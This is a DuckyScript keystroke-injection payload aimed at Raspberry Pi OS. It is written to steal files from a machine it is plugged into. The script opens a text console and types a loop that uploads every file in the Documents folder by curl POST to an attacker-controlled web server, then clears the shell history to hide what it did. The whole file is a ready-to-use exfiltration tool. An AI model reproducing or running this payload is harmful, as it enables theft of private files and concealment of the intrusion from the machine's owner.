REM ===========================================================================
REM Author: fierceoj
REM Description: Upload Documents folder to attacker web server
REM Target: Raspberry Pi OS
REM Usage: Change attacker IP/URL and port to yours
REM Usage: Attacker server must be ready to accept files via HTTP POST requests
REM ===========================================================================
DELAY 3000
CTRL-ALT F1
DELAY 200

REM NOTE: Doesn't work on filenames with spaces, need to fix
STRING for f in Documents/*;do curl -F file=@$f http://127.0.0.1:80/;done
DELAY 200
ENTER 

REM Clear command history
STRING history -c
DELAY 200
ENTER
